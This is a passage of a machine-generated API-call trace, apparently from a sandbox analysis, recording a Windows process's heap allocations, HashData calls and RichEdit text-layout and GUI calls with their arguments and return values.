Size=0x10) returned 0x9f83130 [0168.080] HashData (in: pbData=0x9f83130, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.080] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.080] HashData (in: pbData=0x9f83134, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.080] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0168.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0168.080] HashData (in: pbData=0x9f82f20, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.080] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.080] HashData (in: pbData=0x9f82f24, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.080] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0168.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830b8 [0168.080] HashData (in: pbData=0x9f830b8, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.080] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.080] HashData (in: pbData=0x9f830bc, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.080] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830b8 | out: hHeap=0x5e0000) returned 1 [0168.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.080] HashData (in: pbData=0x9f830a0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.080] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.080] HashData (in: pbData=0x9f830a4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.080] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830a0 | out: hHeap=0x5e0000) returned 1 [0168.081] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ef0 [0168.081] HashData (in: pbData=0x9f82ef0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.081] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.081] HashData (in: pbData=0x9f82ef4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.081] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ef0 | out: hHeap=0x5e0000) returned 1 [0168.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0168.081] HashData (in: pbData=0x9f83100, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0168.081] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0168.081] HashData (in: pbData=0x9f83104, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0168.081] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0168.081] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0168.081] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.082] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.082] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0168.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0168.082] HashData (in: pbData=0x9f82f50, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.082] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.082] HashData (in: pbData=0x9f82f54, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0168.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0168.082] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.082] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.082] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0168.082] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0168.082] HashData (in: pbData=0x9f83118, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.082] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.082] HashData (in: pbData=0x9f8311c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.082] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0168.083] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0168.083] HashData (in: pbData=0x9f82f98, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.083] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.083] HashData (in: pbData=0x9f82f9c, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.083] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0168.083] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0168.083] HashData (in: pbData=0x9f82ff8, cbData=0x1, pbHash=0x198488, cbHash=0x2 | out: pbHash=0x198488) returned 0x0 [0168.083] HashData (in: pbData=0x198484, cbData=0x4, pbHash=0x198490, cbHash=0x2 | out: pbHash=0x198490) returned 0x0 [0168.083] HashData (in: pbData=0x9f82ffc, cbData=0xc, pbHash=0x19848c, cbHash=0x2 | out: pbHash=0x19848c) returned 0x0 [0168.083] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0168.083] LsSetDoc () returned 0x0 [0168.083] LsCreateLine () returned 0x0 [0168.084] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.084] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.084] LsdnFinishRegular () returned 0x0 [0168.084] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.084] LsdnFinishRegular () returned 0x0 [0168.085] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.085] LsDisplayLine () returned 0x0 [0168.085] IOleInPlaceFrame:SetMenu (This=0xd90920, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0168.085] IOleInPlaceFrame:SetMenu (This=0xd90900, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x0) returned 0x0 [0168.085] GetSysColor (nIndex=8) returned 0x0 [0168.085] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.085] GetSysColor (nIndex=8) returned 0x0 [0168.085] LsDestroyLine () returned 0x0 [0168.085] IOleInPlaceSite:CanInPlaceActivate (This=0xcfa380) returned 0x0 [0168.085] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0168.086] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0168.086] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0168.086] HashData (in: pbData=0x9f82f9c, cbData=0x4, pbHash=0x9f82fa0, cbHash=0x2 | out: pbHash=0x9f82fa0) returned 0x0 [0168.086] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.086] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.086] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.086] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.086] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.086] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.086] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0168.086] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0168.086] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.086] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.086] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.087] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0168.087] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0168.087] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83040 [0168.087] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0168.087] HashData (in: pbData=0x9f83044, cbData=0x4, pbHash=0x9f83048, cbHash=0x2 | out: pbHash=0x9f83048) returned 0x0 [0168.087] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.087] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.087] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.087] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.087] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.087] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.087] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.088] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0168.088] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83040 | out: hHeap=0x5e0000) returned 1 [0168.088] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.088] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.088] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.088] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0168.088] GetFocus () returned 0x103e2 [0168.088] GetFocus () returned 0x103e2 [0168.088] GetSysColor (nIndex=15) returned 0xf0f0f0 [0168.089] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0168.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7e08 [0168.089] _CIsqrt () returned 0x407b027f [0168.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0168.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.089] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0168.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dda18 [0168.089] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.090] HashData (in: pbData=0xd94cf0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0168.091] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dda18 | out: hHeap=0x5e0000) returned 1 [0168.093] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0168.094] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0168.094] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0168.094] HashData (in: pbData=0x9f82f24, cbData=0x4, pbHash=0x9f82f28, cbHash=0x2 | out: pbHash=0x9f82f28) returned 0x0 [0168.094] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.094] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.094] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.094] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.094] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.094] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.094] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.095] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0168.095] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0168.095] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.095] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.095] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.095] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0168.095] GetFocus () returned 0x103e2 [0168.095] GetFocus () returned 0x103e2 [0168.095] GetFocus () returned 0x103e2 [0168.095] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.095] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.095] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.095] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.095] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.095] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.096] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fc8 [0168.097] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.097] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.097] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.097] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.097] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0168.097] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.097] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0168.098] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fb0 [0168.100] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0168.100] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0168.101] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fc8 | out: hHeap=0x5e0000) returned 1 [0168.102] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fb0 | out: hHeap=0x5e0000) returned 1 [0168.102] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0168.102] LsSetDoc () returned 0x0 [0168.102] LsCreateLine () returned 0x0 [0168.103] LsDisplayLine () returned 0x0 [0168.105] LsDestroyLine () returned 0x0 [0168.105] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0168.106] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f98 [0168.106] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0168.106] HashData (in: pbData=0x9f82f9c, cbData=0x4, pbHash=0x9f82fa0, cbHash=0x2 | out: pbHash=0x9f82fa0) returned 0x0 [0168.106] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.106] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.106] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.106] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.106] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.107] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.107] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.107] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.107] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0168.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f98 | out: hHeap=0x5e0000) returned 1 [0168.107] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.108] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0168.108] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0168.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0168.108] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0168.109] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830a0 [0168.109] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0168.109] HashData (in: pbData=0x9f830a4, cbData=0x4, pbHash=0x9f830a8, cbHash=0x2 | out: pbHash=0x9f830a8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0168.109] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0168.109] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 